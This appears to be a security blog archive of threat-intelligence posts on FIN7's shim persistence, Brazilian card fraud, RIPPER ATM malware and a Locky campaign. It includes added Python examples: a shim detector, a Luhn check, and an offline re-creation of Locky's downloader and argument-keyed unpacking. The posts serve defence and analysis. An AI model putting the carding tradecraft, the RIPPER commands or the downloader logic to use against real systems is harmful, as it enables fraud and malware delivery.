Archive for the Cyber Crime Category
In 2017, Mandiant responded to multiple incidents we attribute to
FIN7, a financially motivated threat group associated with malicious
operations dating back to 2015. Throughout the various environments,
FIN7 leveraged the CARBANAK backdoor, which this group has used in
previous operations.
A unique aspect of the incidents was how the group installed the
CARBANAK backdoor for persistent access. Mandiant identified that the
group leveraged an application shim database to achieve persistence on
systems in multiple environments. The shim injected a malicious
in-memory patch into the Service Control Manager ("services.exe")
process, and then spawned a CARBANAK backdoor process.
Mandiant identified that FIN7 also used this technique to install a
payment card harvesting utility for persistent access. This was a
departure from FIN7's previous approach of installing a malicious
Windows service for process injection and persistent access.
Application Compatibility Shims Background
According to Microsoft, an application compatibility shim is
"a small library that transparently intercepts an API (via hooking),
changes the parameters passed, handles the operation itself, or
redirects the operation elsewhere, such as additional code stored on a
system." Today, shims are mainly used for compatibility purposes for
legacy applications. While shims serve a legitimate purpose, they can
also be used in a malicious manner. Mandiant consultants previously
discussed shim databases at both
Shim Database Registration
There are multiple ways to register a shim database on a system. One
technique is to use the built-in "sdbinst.exe" command line
tool. Figure 1 displays the two registry keys created when a shim is
registered with the "sdbinst.exe" utility.
Figure 1: Shim database registry keys
Once a shim database has been registered on a system, the shim
database file (".sdb" file extension) will be copied to the
"C:\Windows\AppPatch\Custom" directory for 32-bit shims or the
"C:\Windows\AppPatch\Custom\Custom64" directory for 64-bit shims.
Malicious Shim Database Installation
To install and register the malicious shim database on a system,
FIN7 used a custom Base64 encoded PowerShell script, which ran the
"sdbinst.exe" utility to register a custom shim database file
containing a patch onto a system. Figure 2 provides a decoded excerpt
from a recovered FIN7 PowerShell script showing the parameters for
this command.
Figure 2: Excerpt from a FIN7 PowerShell script to install a custom shim
FIN7 used various naming conventions for the shim database files
that were installed and registered on systems with the "sdbinst.exe"
utility. A common observance was the creation of a shim database file
with a ".tmp" file extension (Figure 3).
Figure 3: Malicious shim database example
Upon registering the custom shim database on a system, a file named
with a random GUID and an ".sdb" extension was written to the 64-bit
shim database default directory, as shown in Figure 4. The registered
shim database file had the same MD5 hash as the file that was
initially created in the "C:\Windows\Temp" directory.
Figure 4: Shim database after registration
In addition, specific registry keys were created that correlated to
the shim database registration. Figure 5 shows the keys and values
related to this shim installation.
Figure 5: Shim database registry keys
The database description used for the shim database registration,
"Microsoft KB2832077", was interesting because this KB number was not a
published Microsoft Knowledge Base patch. This description (shown in
Figure 6) appeared in the listing of installed programs within the
Windows Control Panel on the compromised system.
Figure 6: Shim database as an installed application
Malicious Shim Database Details
During the investigations, Mandiant observed that FIN7 used a custom
shim database to patch both the 32-bit and 64-bit versions of
"services.exe" with their CARBANAK payload. This occurred when the
"services.exe" process executed at startup. The shim database file
contained shellcode for a first stage loader that obtained an
additional shellcode payload stored in a registry key. The second
stage shellcode launched the CARBANAK DLL (stored in a registry key),
which spawned an instance of Service Host ("svchost.exe") and injected
itself into that process.
Figure 7 shows a parsed shim database file that was leveraged by FIN7.
Figure 7: Parsed shim database file
For the first stage loader, the patch overwrote the
"ScRegisterTCPEndpoint" function at relative virtual address (RVA)
"0x0001407c" within the services.exe process with the malicious
shellcode from the shim database file.
The new "ScRegisterTCPEndpoint" function (shellcode) contained a
reference to the path "\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM",
which is a registry location where additional malicious shellcode and
the CARBANAK DLL payload were stored on the system.
Figure 8 provides an excerpt of the parsed patch structure within
the recovered shim database file.
Figure 8: Parsed patch structure from the shim
database file
The shellcode stored within the registry path
"HKLM\SOFTWARE\Microsoft\DRM" used the API function
"RtlDecompressBuffer" to decompress the payload. It then slept for
four minutes before calling the CARBANAK DLL payload's entry point on
the system. Once loaded in memory, it created a new process named
"svchost.exe" that contained the CARBANAK DLL.
Bringing it Together
Figure 9 provides a high-level overview of a shim database being
leveraged as a persistent mechanism for utilizing an in-memory patch,
injecting shellcode into the 64-bit version of &services.exe&.
Figure 9: Shim database code injection process
Mandiant recommends the following to detect malicious application
shimming in an environment:
- Monitor for new shim database files created in the default shim database directories of "C:\Windows\AppPatch\Custom" and "C:\Windows\AppPatch\Custom\Custom64"
- Monitor for registry key creation and/or modification events for the keys "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" and "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB"
- Monitor process execution events and command line arguments for malicious use of the "sdbinst.exe" utility
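The three detections recommended above, together with the registration artifacts from the Shim Database Registration section (the two AppPatch directories and the two AppCompatFlags keys), applied to a few constructed endpoint events. This is an added example, not code from the original post or from Mandiant; it assumes Sysmon-style event fields (EventID 1 process create with Image/CommandLine, 11 file create with TargetFilename, 13 registry value set with TargetObject/Details). The sample GUID and .tmp file name are made up, and the "staging path" severity heuristic is the example's own addition.

```python
import ntpath
import re

# Default shim database directories (32-bit and 64-bit), lower-cased for matching.
SHIM_DIRS = {
    r"c:\windows\apppatch\custom",
    r"c:\windows\apppatch\custom\custom64",
}
# Registry keys written when a shim database is registered.
SHIM_KEYS = (
    r"hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom",
    r"hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb",
)
# Heuristic assumed by this example (not part of the post's list): a database
# registered from a temp directory, as FIN7's C:\Windows\Temp\*.tmp files were,
# is rated higher than one registered from an installer's own directory.
STAGING_PATH = re.compile(r"\\(temp|tmp)\\", re.I)


def _norm(path):
    """Lower-case and use backslashes so comparisons ignore case and separator style."""
    return path.replace("/", "\\").lower()


def check_event(ev):
    """Return a list of (rule, detail) hits for one Sysmon-style event dict."""
    hits = []
    eid = ev.get("EventID")
    if eid == 11:                                  # FileCreate
        target = _norm(ev.get("TargetFilename", ""))
        if target.endswith(".sdb") and ntpath.dirname(target) in SHIM_DIRS:
            hits.append(("shim_file_created", target))
    elif eid == 13:                                # RegistryEvent (value set)
        key = _norm(ev.get("TargetObject", ""))
        if any(key.startswith(base + "\\") for base in SHIM_KEYS):
            hits.append(("shim_registry_write", key))
            details = ev.get("Details", "")
            # FIN7's database carried the description "Microsoft KB2832077", a KB
            # number Microsoft never published. Offline, this can only flag the
            # pattern; the analyst verifies the KB against Microsoft's catalog.
            if key.endswith(r"\databasedescription") and re.match(r"microsoft kb\d+", details, re.I):
                hits.append(("shim_description_claims_kb", details))
    elif eid == 1:                                 # ProcessCreate
        image = _norm(ev.get("Image", ""))
        if ntpath.basename(image) == "sdbinst.exe":
            cmd = ev.get("CommandLine", "")
            severity = "high" if STAGING_PATH.search(cmd) else "medium"
            hits.append(("sdbinst_execution", f"{severity}: {cmd}"))
    return hits


def scan(events):
    """Run check_event over an iterable of events and collect every hit in order."""
    hits = []
    for ev in events:
        hits.extend(check_event(ev))
    return hits


# Constructed sample telemetry. The GUID and the .tmp name are made up; the
# description string is the one the post reports.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\sdbinst.exe",
     "CommandLine": r'sdbinst.exe -q "C:\Windows\Temp\1a2b3c4d.tmp"'},
    {"EventID": 11, "TargetFilename":
        r"C:\Windows\AppPatch\Custom\Custom64\{1e0f7c2a-1111-4222-8333-444455556666}.sdb"},
    {"EventID": 13, "TargetObject":
        r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB"
        r"\{1e0f7c2a-1111-4222-8333-444455556666}\DatabaseDescription",
     "Details": "Microsoft KB2832077"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 11, "TargetFilename": r"C:\Users\alice\Documents\notes.sdb"},
]

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"{rule:28} {detail}")
```

Run against the constructed events, the first three fire (the sdbinst execution from a temp path, the 64-bit .sdb drop, and the InstalledSDB write with its unpublished KB description) and the two benign events stay silent. In production the same three checks map directly onto Sysmon event IDs 1, 11 and 13, and the KB-number hit is the one worth an analyst's manual follow-up.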
FIN7 is a financially-motivated threat group that has been associated
with malicious operations dating back to late 2015. FIN7 is referred
to by many vendors as “Carbanak Group”, although we do not equate all
usage of the CARBANAK backdoor with F…
Introduction
Brazil has been designated a major hub for financially motivated
eCrime threat activity. Brazilian threat actors are targeting domestic
and foreign entities and individuals, with frequent targeting of U.S.
assets. The country routinely places in “Top Five” lists of
various global cyber crime rankings, and multiple sources claim that
financially motivated threat activity in the country has increased
within the past few years.
In this blog we provide insight into the tactics, techniques and
procedures (TTPs) of a Brazilian cyber crime group that specializes in
payment card fraud operations. The threat actors, observed by FireEye
Labs, use a variety of different methods to either compromise or
acquire already compromised payment card credentials, including
sharing or purchasing dumps online, hacking vulnerable merchant
websites and compromising payment card processing devices. Once in
their possession, the actors use these compromised payment card
credentials to generate further card information. The main methods
used by the observed group to launder and monetize illicit funds
include online purchases of various goods and services as well as ATM withdrawals.
Based on extensive observation of this group's activity, we are able
to characterize their operations lifecycle: starting with the initial
preparation of the workplace, followed by the methods used to compromise
credentials or, conversely, purchase already compromised ones,
then the process of generating new cards for subsequent abuse, which
includes validation, and finally the subsequent
monetization strategies. Figure 1 depicts this operation workflow.
Figure 1: Brazilian carding operation workflow
Phase 1: Setting Up the Workplace
We observed this group taking several preparatory measures to
maintain anonymity.
The members of the group use a variety of tools, including CCleaner,
on a daily basis to effectively remove any evidence of their
operations. This includes browsing history, temporary files,
Clipboard, typed URLs, cookies, recently opened documents, and
conversations via Skype, Windows Messenger, etc. This almost certainly
limits the potential amount of evidence that law enforcement could
obtain and use against the suspects in the case of an arrest or
property search.
Another common step taken by threat actors is changing their
system’s MAC Address to avoid being uniquely identified. For this
purpose, these actors often use tools such as Technitium MAC Address Changer.
We have observed these actors using Tor or proxy-based tools similar
to Tor (e.g., UltraSurf, as seen in Figure 2). We have also observed
them using virtual private network services that use IPs based in
numerous countries to ensure anonymity and obfuscate criminal operations.
Figure 2: Ultra Surf 12.10
Additionally, many actors conduct transactions using virtual
currencies, most prominently Bitcoin, to anonymize criminal
transactions. Due to the comparative anonymity and lack of government
oversight often associated with the use of virtual currencies, virtual
currency is of significant value for actors involved in illicit
operations when they are performing transactions among themselves.
Phase 2: Data Acquisition
Based on our observations, this group uses a variety of different
methods to either compromise or acquire already compromised payment
card credentials.
Payment card “dumps” are commonly shared amongst Brazilian
threat actors via social media forums such as Facebook, Skype, and
web-based WhatsApp messenger. These social media circles are highly
prevalent amongst these regional actors and are often the preferred
method of communication. This group takes advantage of those
communities to obtain stolen data from peers. Similarly, the group
takes advantage of freely available consolidations of email
credentials, personal information, and other data shared in eCrime
forums for fraud purposes.
The group systematically purchases payment card data via different
online shops. These shops include “Toy Store,” “Joker’s
Stash,” and “Cvv2finder.” The venues, called “dump
shops,” allow customers to use a web-based platform to sort
through thousands or millions of individual pieces of card data and
purchase as much or as little as they want. The shops provide
customers with filters to select the individual pieces of card data
they wish to purchase and add to their carts for checkout, similar to
legitimate sites. The same types of shops also allow malicious actors
to buy credentials stolen from other services such as email
providers, online bill payment websites, entertainment services, or
travel booking websites.
These actors scan websites for vulnerabilities to exploit to
illicitly access databases. They most commonly target Brazilian
merchants, though others use the same tactics to exploit entities
outside Brazil. One simple method the group uses is Google Dorks,
advanced Google searches used to identify security loopholes on
Google-indexed websites. An example is shown in Figure 3.
Figure 3: Example of Portuguese-language Google
Dork used in exploitation
The group also uses the SQL injection (SQLi) tools “Havij
Advanced SQL Injection Tool” and “SQLi Dumper version
7.0” (Figure 4) to scan for and exploit vulnerabilities in
targeted eCommerce sites. Of note, these tools can dump whole
databases from targeted victims.
Figure 4: SQLi Dumper v7.0
This group has also shown interest in modifying point-of-sale (POS)
terminals to harvest magnetic stripe and EMV chip data.
“Toy Store”
FireEye Labs identified "Toy Store" as one of the card
shops frequently used by the group. It appears that this card shop has
operated since November 2015. Despite the fact that the website has
been taken down multiple times (most recently in July 2016), it keeps
operating, sometimes with newly registered domains.
The store offers a large amount of dumps from multiple sellers. The
sold credentials are associated with payment cards of various types,
issued by a variety of financial institutions from multiple countries.
At least eight sellers update the website as frequently as daily,
offering newly obtained databases from the U.S.
Examination of dumps uploaded between May 2016 and July 2016
revealed that one vendor uploaded 1,900 credit cards issued by
Brazilian banks. Further examination shows sellers uploading dumps
regularly from the same locations. In Table 1, seller “X”
uploaded the listed data during the first two weeks of August 2016.
Table 1: Data advertised by one “Toy
Store” vendor
This seller uploads dumps exclusively from either Texas or Florida.
Some base names they provide even contain the word “POS,”
with a validity rate of 90 percent. This suggests that ATM skimming
devices or malware are probably installed in these locations.
The shop allows users to make bulk purchases for any U.S. state,
ranging from packages of 30 to 500 units with prices ranging from $250
to $1,000 per bulk.
Registration is free and the only payment method accepted is
Bitcoin. A unique Bitcoin payment address is generated per user.
Finally, the website has checker functionality (charging $0.50 per
check) that allows users to quickly check for credit card validity
and ask for a refund if a purchased card is not valid (Figure 5).
Figure 5: Toy Store shop site
Phase 3: Generating Further Card Numbers
Once in possession of compromised payment card credentials, these
actors use tools commonly known as “card generators” to
generate new card numbers based on the compromised ones, creating
additional opportunities for monetization. These tools require as
input a valid 16-digit credit card number, expiration date, and a file
name to store the new cards generated. Examples of such tools commonly
used by Brazilian carders include “WZP” (Figure 6) and
“Gerador CC” (Figure 7).
Figure 6: “WZP” card generator
Figure 7: “Gerador CC” card generator
“Gerador CC” generates credit card numbers based on the
Bank Identifier Number (BIN), with a fixed expiration date and CVV
equal to 000. Typically, 1,000 cards will be generated per round. Then
threat actors use public websites set up to check if the credit card
number is valid. However, the fact that the card number generated is
valid does not necessarily mean the card can be used for real
purchases at any website. This method of generating card data cannot
determine what validation information (e.g., expiration date) or
personal information should be associated with the card numbers. So,
to make purchases with the data, actors have to find websites with
vulnerable authentication systems.
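What the public "validity" checkers described above actually test is the Luhn (mod 10) digit check, shown here as an added example that is not code from the post or from any of the tools it names. One in ten random completions of a fixed BIN passes Luhn, which is why a generator can produce "valid" numbers by the thousand and why a merchant must rely on issuer authorization rather than number validity. The sample numbers are constructed (the first two are the industry-standard test numbers) and identify no real account.

```python
def _digits(pan):
    """Strip the separators people type; the caller decides what else is allowed."""
    return pan.replace(" ", "").replace("-", "")


def luhn_ok(pan):
    """Luhn (mod 10) check on a PAN given as a string; spaces and hyphens are allowed.
    True means the digits are self-consistent, not that any issuer knows this card."""
    s = _digits(pan)
    if not s.isdigit() or not 12 <= len(s) <= 19:
        return False
    total = 0
    for i, ch in enumerate(reversed(s)):
        d = int(ch)
        if i % 2 == 1:                # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def bin_of(pan):
    """First six digits: the issuer range a generator keeps fixed while varying the rest."""
    return _digits(pan)[:6]


def triage(pans):
    """Classify candidate numbers the way a merchant-side pre-check would, before
    spending an authorization request on any of them."""
    result = {}
    for pan in pans:
        s = _digits(pan)
        if not s.isdigit() or not 12 <= len(s) <= 19:
            result[pan] = "malformed"
        elif not luhn_ok(pan):
            result[pan] = "luhn_fail"
        else:
            result[pan] = "luhn_ok"
    return result


# Constructed inputs: two standard test numbers, then edits of them.
SAMPLE_PANS = [
    "4111 1111 1111 1111",
    "5555555555554444",
    "4111111111111112",
    "4111-1111",
    "4111111111111abc",
]

if __name__ == "__main__":
    for pan, status in triage(SAMPLE_PANS).items():
        print(f"{pan:22} BIN={bin_of(pan):6} {status}")
```

A "luhn_ok" result is the most a local check can say; expiry date, CVV and whether the account exists at all are exactly the fields the generators described above cannot know, so the only real validation is the issuer's answer to an authorization attempt, which is what the carders' "checker" services abuse.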
Phase 4: Validating New Card Numbers
After stealing, buying, or generating card data, the group validates
it through multiple tools and services available in underground communities.
Vulnerable merchant websites (websites that accept payments with
generated or compromised payment cards) are identified and used
regularly by carders. For example, in March 2016, we observed an
advertisement in an underground community for a list that contained
the addresses of 10,000 vulnerable merchant websites. Criminals take
advantage of these sites to not only make purchases, but also to
bulk-check card data for usability.
One bulk card-checking tool this group uses is "Testador
Amazon.com v1.1" (Figure 8). Despite its name, this tool does not
use Amazon's website, but exploits an unauthenticated Cross-Site
Request Forgery (CSRF) vulnerability of a merchant website allowing
the abuse of PayPal Payflow Link functionality (Figure 9).
Figure 8: Testador Amazon v1.1 GUI
Figure 9: PayPal Payflow Link page
A Payflow Link is a PayPal-hosted payment solution that allows
merchant websites to securely connect their customers to PayPal’s
secure server and use it to automate order acceptance, authorization,
processing, and transaction management, making it useful for carders
to check the validity of credit card numbers. Payflow links cannot be
accessed directly, but only from trusted and authenticated merchants.
“Testador Amazon” abuses legitimate merchant sites to submit
unauthenticated valid orders, providing access to a legacy PayPal
Payflow Link. At this point, actors can test the generated credit card
numbers by filling the input field of the form automatically via the
tool. This tool then continues submitting thousands of valid orders,
simultaneously checking for the validity of the next credit card
number in the list.
The actors use a dedicated IRC channel provided by the eCrime
community service “ChkNet” (Figure 10) to validate credit
cards. Based on our observations of interactions in this channel,
between May 2016 and June 2016, malicious actors validated 2,987 cards
from 62 countries, with the most coming from the U.S. (nearly half),
Brazil, and France. The actors in the channel share instructions on
validation and advice on maintaining anonymity during these
operations. The channel is accessible, and actors interested in
using the IRC bot to verify the validity of credit cards are charged
0.003 BTC ($1.88 USD).
Figure 10: ChkNet IRC service activation
Another validation method involves using online charity donations.
ChkNet also provides an API and a software tool named "Checker" that
leverages charity websites for this purpose. This type of exploitation
of charities is popular in the Brazilian eCrime community. Figure 11
shows a credit card tested by Checker. The status "Live" means the
card was successfully used during an online payment transaction.
Figure 11: Checker credit card validation result
Phase 5: Laundering and Monetization
We observed this group using multiple tactics to monetize the card
data it steals and generates.
The actors frequently use the stolen data to create cloned physical
cards, which they use to attempt to withdraw funds from ATMs. The
group has performed these activities at multiple locations across
Brazil, possibly using multiple mules. The group primarily uses the
MSR 606 Software (Figure 12) and Hardware (Figure 13) to create cloned cards.
Figure 12: MSR606 software
Figure 13: MSR606 Magnetic Stripe card reader/writer
Additionally, we observed the group exploiting popular eCommerce
sites to perform fraudulent transactions. This monetization tactic
requires the group to constantly refine its tactics to deal with
measures put in place to validate that card and cardholder data is
legitimate and other anti-fraud checks. Carders in the community with
whom this group interacts regularly share recommendations based on
this experience, such as using virtual private networks, limiting the
number of items purchased at a time, and cleaning machines used to
make purchases of any profiling information such as cookies.
Whether this group uses any further means to launder the proceeds
from these activities is unclear. However, Brazilian actors commonly
use several methods to do so, such as reselling cards they have
created, paying bills with stolen cards in return for a portion of the
bill’s value and reselling illicitly obtained goods.
Payment card fraud has been extremely profitable for malicious
actors for years. Given its profitability and actors’ investment in
this type of fraud, we see no indication of actors moving away from
this type of activity for the foreseeable future. As security measures
continue to evolve to counter this area of fraud, we will likely see
actors attempting to devise new schemes to maintain the profits they
are obtaining and continue capitalizing on their investments in this area.
This material was originally posted to the FireEye iSIGHT
Intelligence MySIGHT Portal on Oct. 7, 2016. The FireEye iSIGHT
Intelligence MySIGHT Portal contains additional information based on
our investigations of a variety of topics discussed in this post,
including Joker's Stash, ChkNet, virtual currencies, and
point-of-sale systems. Visit the portal for more information.
FireEye iSIGHT Intelligence has been tracking a pair of
cybercriminals that we refer to as the "Vendetta Brothers." This
enterprising duo uses various strategies to compromise point-of-sale
systems, steal payment card information and sell it on their
underground marketplace "Vendetta World."
The Vendetta Brothers (who we believe operate from Spain and
Eastern Europe) have been observed using everything from phishing to
installing physical skimmers to steal payment card data, and their
targets have mostly been located in the U.S. and Nordic countries.
Our latest report shines light on the Vendetta Brothers' tactics,
techniques and procedures, which involve the use of practices more
commonly seen in legitimate business, including outsourcing,
partnerships, diversifying their market, and insulating liability.
We expect to see other cybercriminal groups using these more
advanced techniques as a way of scaling their operations and
increasing profits, all while mitigating risk and potentially
frustrating investigators.
On Aug. 23, 2016, FireEye detected a potentially new ATM malware
sample that used some interesting techniques not seen before. To add
more fuel to an existing fire, the sample was uploaded to VirusTotal
from an IP address in Thailand a couple of minutes before the Bangkok
Post newspaper reported the theft of 12 million baht from ATMs at
banks in Thailand.
In this blog, FireEye Labs dissects this new ATM malware that we
have dubbed RIPPER (due to the project name "ATMRIPPER"
identified in the sample) and documents indicators that strongly
suggest this piece of malware is the one used to steal from the ATMs
at banks in Thailand.
Connection to previous ATM Malware
- Targets the same ATM brand.
- The technique used to expel currency follows the same strategy (already documented) performed by the Padpin (Tyupkin) family.
- Similar to SUCEFUL, it is able to control the Card Reader device to Read or Eject the card on demand.
- Can disable the local network interface, similar to capabilities of the Padpin family.
- Uses the "sdelete" secure deletion tool, similar to GreenDispenser, to remove forensic evidence.
- Enforces a limit of 40 bank notes per withdrawal consistently, which is the maximum allowed by the ATM vendor.
New features, capabilities, or behaviors in RIPPER
- It targets three of the main ATM vendors worldwide, which is a first.
- RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism. Although this technique was already used by another malware family, it is an uncommon mechanism.
Similarities between RIPPER and the recent ATM theft in Thailand
RIPPER analysis
MD5: e5ca0ccb0a042daf2adc13
RIPPER Persistence:
RIPPER can maintain persistence using two modes: either as a
standalone service or masquerading as a legitimate ATM process.
RIPPER is installed as a service if called with the following arguments:
service install
Before creating the service, it will kill the process "dbackup.exe",
which is specific to one common ATM vendor:
cmd /c taskkill /IM dbackup.exe /T /F
Then it will replace the original dbackup.exe binary under
c:\Windows\system32\ (if present) with itself.
Finally it will install a persistent service with the following attributes:
RIPPER can delete the "DBackup Service" service if run with the
following arguments:
service remove
RIPPER can stop or start the "DBackup Service" with the following arguments:
"service start" or "service stop"
RIPPER also supports the following command line switches:
/autorun: Will Sleep for 10 minutes and then run in the
background, waiting for interaction.
/install: RIPPER will replace the ATM software running on the
ATM as follows:
Upon execution, RIPPER will kill the processes running in memory for
the three targeted ATM Vendors via the native Windows &taskkill& tool.
RIPPER will examine the contents of directories associated with the
targeted ATM vendors and will replace legitimate executables with
itself. This technique allows the malware to maintain the legitimate
program name to avoid suspicion.
RIPPER will maintain persistence by adding itself to the
\Run\FwLoadPm registry key (that might already exist as part of the
vendor installation), passing the &/autorun& parameter that is
understood by the malware, as seen in Figure 1.
Figure 1: Registry key added for persistency
/uninstall: RIPPER removes the registry keys created
Running without parameters
If RIPPER is executed without any parameters, it will perform the
following actions:
1. It will connect with the Cash Dispenser, Card Reader and the
Pinpad. Since every ATM brand has its own unique device names, RIPPER
will identify the current devices installed by enumerating them under
the following registry key:
HKEY_USERS\.DEFAULT\XFS\LOGICAL_SERVICES\
2. RIPPER will make sure the devices are available by querying
their status (Figure 2), and if not available, will exit.
Figure 2: Querying the devices status via WFSGetInfo() API
3. For the Dispenser it will obtain information such as the Cash
Unit details to determine the number and type of available notes.
4. Finally it creates two threads, the first of which will
monitor the status of the ATM devices to make sure they are available
and will read all the keystrokes received from the Pinpad device,
waiting to interact with the thieves (see step 7), as seen in Figure 3.
Figure 3: Monitoring Pinpad keystrokes
5. The second thread monitors the Card Reader, and once a card
is inserted it validates the EMV chip for authentication to the ATM malware.
6. Once a valid card with a malicious EMV chip is detected,
RIPPER will instantiate a timer to allow a thief to control the
machine. Figure 4 depicts the timer function.
Figure 4: Monitoring the Card Reader
7. Once the thieves start interacting with RIPPER, they enter
instructions via the Pinpad and multiple options are displayed,
including methods for dispensing currency. Figure 5 depicts some of
the options available to the thieves.
a. CLEAN LOGS: Will clear the log stored at C:\WINDOWS\temp\clnup.dat
b. HIDE: Will hide the malware GUI by calling the ShowWindow() API.
c. NETWORK DISABLE: Will shut down the ATM local network
interface to prevent it from communicating with the bank. It can
re-enable the connection if needed.
Figure 5: Main Menu
d. REBOOT: Will call the ExitWindowsEx() API without sending the
WM_QUERYENDSESSION message to avoid prompts for confirmation, causing
the system to reboot.
e. BACK: Ejects the malicious ATM card back to the
thieves by calling WFSExecute() with the command
WFS_CMD_IDC_EJECT_CARD. This option, depicted in Figure 6, was
observed being used by the SUCEFUL family.
Figure 6: Asking Card Reader to eject the chip card
Conclusion
Through open sources, we've identified a family of malware that may
have been used in recent ATM robberies and which bears some
similarities to known families of malware. This malware family can be
used to compromise multiple vendor platforms and leverages uncommon
technology to access physical devices. In addition to requiring
technical sophistication, attacks such as that affecting the ATMs in
Thailand require coordination of both the virtual and the physical.
This speaks to the formidable nature of the thieves.
On June 21, 2016, FireEye's Dynamic Threat Intelligence (DTI)
identified an increase in JavaScript contained within spam emails.
FireEye analysts determined the increase was the result of a new Locky
ransomware spam campaign.
As shown in Figure 1, Locky spam activity was uninterrupted until
June 1, 2016, when it stopped for nearly three weeks. During this
period, Locky was the most dominant ransomware distributed in spam
email. Now, Locky distribution has returned to the level seen during
the first half of 2016.
Figure 1. Locky spam activity in 2016
Figure 2 shows that the majority of Locky spam email detections
between June 21 and June 23 of this year were recorded in Japan, the
United States and South Korea.
Figure 2. Locky spam by country from June 21 to
June 23 of this year
The spam email (a sample is shown in Figure 3) purports to
contain an unpaid invoice in an attached ZIP archive. Instead of an
invoice, the ZIP archive contains a Locky downloader written in JavaScript.
Figure 3. Locky spam email
JavaScript based Downloader Updates
In this campaign, few updates were seen in both the JavaScript-based
downloader and the Locky payload.
The JavaScript downloader does the following:
1. Iterates over an array of URLs hosting the Locky payload.
2. If a connection to one of the URLs fails, the JavaScript sleeps for 1,000 ms before continuing to iterate over the array of URLs.
3. Uses a custom XOR-based decryption routine to decrypt the Locky payload.
4. Ensures the decrypted binary is of a predefined size. In Figure 4 below, the size of the decrypted binary had to be greater than 143,360 bytes and smaller than 153,660 bytes to be executed.
Figure 4. Payload download function in JavaScript
5. Checks (Figure 5) that the first two bytes of the binary contain the "MZ" header signature.
Figure 5: MZ header check
6. Executes the decrypted payload by passing it the command line parameter "123".
Locky Payload Updates
The Locky ransomware downloaded in this campaign requires a command
line argument to properly execute. This command line parameter, &123&
in the analyzed sample, is passed to the binary by the first stage
JavaScript-based downloader. This command line parameter value is used
in the code unpacking stage of the ransomware. Legitimate binaries
typically verify the number of arguments passed or compare the command
line parameter with the expected value and gracefully exit if the
check fails. However in the case of this Locky ransomware, the program
does not exit (Figure 6) and the value received as a command line
parameter is added to a constant value defined in the binary. The sum
of the constant and the parameter value is used in the decryption
routine (Figure 7). If no command line parameter is passed, it adds
zero to the constant.
Figure 6. Command line parameter check
Figure 7. Decryption routine
If no command line parameter is passed, then the constant used by the
decryption routine is incorrect. This results in a program crash, as the
decrypted code is invalid. Figure 8 and Figure 9 show the
decrypted code sections with and without the command line parameter, respectively.
Figure 8. Correct decrypted code
Figure 9. Incorrect decrypted code
By using this technique, Locky authors have created a dependency on
the first stage downloader for the second stage to be executed
properly. If a second stage payload such as this is directly analyzed,
it will result in a crash.
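The two stage-gating tricks described in the JavaScript downloader steps and in the payload's command line dependency above, re-created together as an added example. This is not Locky's code or FireEye's: only the size window, the "MZ" check, the 1,000 ms retry pause and the "123" argument come from the post. The XOR key bytes, the single-byte second-stage XOR, the constant 0x2A, the sample "code" bytes and the fake fetcher are all assumptions made so the example runs offline.

```python
SIZE_MIN, SIZE_MAX = 143_360, 153_660   # exclusive bounds from the downloader (Figure 4)
STAGE2_PARAM = "123"                   # the argument the downloader passes to the payload

# Everything below is an assumption of the example, not Locky's scheme.
STAGE1_KEY = b"constructed-key"
STAGE2_CONST = 0x2A
SAMPLE_CODE = b"\x55\x8b\xec\x83\xec\x10"   # x86 prologue standing in for unpacked code


def xor_bytes(data, key):
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_sample_payload(size=150_000):
    """A constructed 'binary': MZ header plus padding, sized inside the window."""
    return b"MZ" + b"\x90" * (size - 2)


def stage1_accepts(blob):
    """Apply the downloader's gates to one fetched blob.
    Returns the decrypted bytes if every check passes, otherwise None."""
    payload = xor_bytes(blob, STAGE1_KEY)
    if not (SIZE_MIN < len(payload) < SIZE_MAX):
        return None                      # wrong size: truncated download or decoy page
    if payload[:2] != b"MZ":
        return None                      # not a PE image after decryption
    return payload


def fetch_first_valid(urls, fetcher, sleep_ms=lambda ms: None):
    """Walk the URL list the way the downloader does: a failed connection costs a
    1,000 ms pause and the next URL is tried; the first blob passing stage1_accepts wins."""
    for url in urls:
        try:
            blob = fetcher(url)
        except OSError:
            sleep_ms(1000)
            continue
        payload = stage1_accepts(blob)
        if payload is not None:
            return url, payload
    return None, None


def fake_fetcher(table):
    """Constructed stand-in for an HTTP GET: unknown URLs raise like a dead host."""
    def fetch(url):
        if url not in table:
            raise OSError("connection failed: " + url)
        return table[url]
    return fetch


def _stage2_key(argv):
    """Key derivation as the post describes it: constant + command line value.
    A missing argument is not an error; it simply contributes zero."""
    param = int(argv[1]) if len(argv) > 1 and argv[1].isdigit() else 0
    return (STAGE2_CONST + param) & 0xFF


def pack_stage2(code):
    """Pack code so that only argv[1] == STAGE2_PARAM reproduces it."""
    key = _stage2_key(["payload.exe", STAGE2_PARAM])
    return bytes(b ^ key for b in code)


def stage2_unpack(packed, argv):
    """What the payload does at startup: derive the key from argv and XOR-unpack.
    With the wrong (or no) argument the result is garbage, which is where the
    real sample crashes when an analyst runs it on its own."""
    key = _stage2_key(argv)
    return bytes(b ^ key for b in packed)


if __name__ == "__main__":
    payload = build_sample_payload()
    hosts = {"http://host-b.example/2": xor_bytes(payload, STAGE1_KEY)}
    url, got = fetch_first_valid(["http://dead.example/1", "http://host-b.example/2"],
                                 fake_fetcher(hosts))
    print("stage 1 accepted from", url, "size", len(got))
    packed = pack_stage2(SAMPLE_CODE)
    print("with 123:   ", stage2_unpack(packed, ["payload.exe", "123"]).hex())
    print("without arg:", stage2_unpack(packed, ["payload.exe"]).hex())
```

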